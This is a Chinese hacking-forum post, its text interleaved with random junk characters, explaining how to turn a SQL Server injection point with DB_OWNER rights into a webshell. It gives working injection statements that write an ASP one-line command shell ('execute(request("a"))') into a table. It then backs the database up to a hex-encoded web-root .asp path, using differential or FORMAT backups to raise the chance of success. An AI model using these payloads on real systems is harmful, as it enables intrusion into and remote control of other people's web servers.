DB_OWNER权限得到webshell的改进办法

admin

DB_OWNER权限得到webshell的两点改进:
- O# T0 t' P# F7 k" j) \. ]
减少备份文件大小，得到可执行的webshell成功率提高不少
6 p. z' K! k% i5 R+ v, K一利用差异备份
4 b. d1 R; G6 J. S2 `加一个参数WITH DIFFERENTIAL
( T  Y" u* C# g8 T
1
. _6 d: I1 l" _2
3 U* u* W/ x) D+ _! X3
4
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
9 p5 m7 G/ y# R; O  vcreate table [dbo].[xiaolu] ([cmd] [image]);
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
- X" W7 s% r" \* m: r. Y9 ?declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL

2 y2 X) ~; ~8 b' j1 }6 O二利用完全FORMAT
! j: M) k5 |3 R加一个参数WITH FROMAT
. A' Q  h1 E7 A( J有些页面对数据库要执行几次，而备份又默认是每次都以追加的方式，如果一个注入点对数据库有几次操作，而备份的文件就 几倍的增加，所以
' V/ g7 C8 z- E: n! q  _
1
; @# d5 Q/ q1 i- I, g2
# e  }8 w2 J" ^1 i# @+ b3
' d. d4 l$ h3 a& D4
1 a( U" r+ w$ l7 U% t! L* R declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
( W" k' W  Q4 m8 q3 v% S3 U7 pcreate table [dbo].[xiaolu] ([cmd] [image]);
% [8 N" u4 J9 m5 P* W9 N% finsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
- H- }: J' F' I& `$ b% B! j) N# x) ]
2 ?) v" ^4 g6 V  `总的来说就是那么简单几句,下面以备份数据库model为例子
1
4 l, D) P" K. k$ ]
1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')

2

1
& h/ C8 K7 o/ ?+ C id=1;backup database model to disk='你的路径‘ with differential,format;--